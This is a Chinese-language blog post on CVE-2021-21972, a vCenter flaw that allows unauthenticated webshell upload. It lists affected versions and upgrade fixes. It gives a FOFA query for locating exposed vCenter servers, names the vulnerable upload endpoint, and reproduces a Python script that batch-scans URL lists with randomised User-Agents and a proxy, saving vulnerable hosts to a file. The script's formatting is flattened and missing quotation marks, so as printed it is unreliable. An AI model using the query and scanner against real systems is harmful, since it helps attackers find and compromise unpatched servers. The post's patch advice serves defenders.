背景
CVE-2021-21972 vmware vcenter的一个未授权的命令执行漏洞。该漏洞可以上传一个webshell至vcenter服务器的任意位置,然后执行webshell即可。
影响版本
vmware:esxi:7.0/6.7/6.5
vmware:vcenter_server:7.0/6.7/6.5漏洞复现 fofa查询
语法:title=”+ ID_VC_Welcome +”
POC
https://x.x.x.x/ui/vropspluginui/rest/services/uploadova
使用https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC脚本批量验证
#-*- coding:utf-8 -*- banner = “”” 888888ba dP 88 `8b 88 a88aaaa8P .d8888b. d8888P .d8888b. dP dP 88 `8b. 88 `88 88 Y8ooooo. 88 88 88 .88 88. .88 88 88 88. .88 88888888P `88888P8 dP `88888P `88888P ooooooooooooooooooooooooooooooooooooooooooooooooooooo @time:2021/02/24 CVE-2021-21972.py C0de by NebulabdSec – @batsu “”” print(banner) import threadpool import random import requests import argparse import http.client import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) http.client.HTTPConnection._http_vsn = 10 http.client.HTTPConnection._http_vsn_str = HTTP/1.0 TARGET_URI = “/ui/vropspluginui/rest/services/uploadova” def get_ua(): first_num = random.randint(55, 62) third_num = random.randint(0, 3200) fourth_num = random.randint(0, 140) os_type = [ (Windows NT 6.1; WOW64), (Windows NT 10.0; WOW64), (X11; Linux x86_64), (Macintosh; Intel Mac OS X 10_12_6) ] chrome_version = Chrome/{}.0.{}.{}.format(first_num, third_num, fourth_num) ua = .join([Mozilla/5.0, random.choice(os_type), AppleWebKit/537.36, (KHTML, like Gecko), chrome_version, Safari/537.36] ) return ua def CVE_2021_21972(url): proxies = {“scoks5”: “http://127.0.0.1:1081”} headers = { User-Agent: get_ua(), “Content-Type”: “application/x-www-form-urlencoded” } targetUrl = url + TARGET_URI try: res = requests.get(targetUrl, headers=headers, timeout=15, verify=False, proxies=proxies) # proxies={socks5: http://127.0.0.1:1081}) # print(len(res.text)) if res.status_code == 405: print(“[+] URL:{}——–存在CVE-2021-21972漏洞”.format(url)) # print(“[+] Command success result: ” + res.text + “n”) with open(“存在漏洞地址.txt”, a) as fw: fw.write(url + n) else: print(“[-] ” + url + ” 没有发现CVE-2021-21972漏洞.n”) # except Exception as e: # print(e) except: print(“[-] ” + url + ” Request ERROR.n”) def multithreading(filename, pools=5): works = [] with open(filename, “r”) as f: for i in f: func_params = [i.rstrip(“n”)] # func_params = [i] + [cmd] works.append((func_params, None)) pool = threadpool.ThreadPool(pools) reqs = threadpool.makeRequests(CVE_2021_21972, works) [pool.putRequest(req) for req in reqs] pool.wait() def main(): parser = argparse.ArgumentParser() parser.add_argument(“-u”, “–url”, help=”Target URL; Example:http://ip:port”) parser.add_argument(“-f”, “–file”, help=”Url File; Example:url.txt”) # parser.add_argument(“-c”, “–cmd”, help=”Commands to be executed; “) args = parser.parse_args() url = args.url # cmd = args.cmd file_path = args.file if url != None and file_path ==None: CVE_2021_21972(url) elif url == None and file_path != None: multithreading(file_path, 10) # 默认15线程 if __name__ == “__main__”: main()
EXP 修复建议
vCenter Server7.0版本升级到7.0.U1c
vCenter Server6.7版本升级到6.7.U3l
vCenter Server6.5版本升级到6.5 U3n
© 版权声明
THE END
暂无评论内容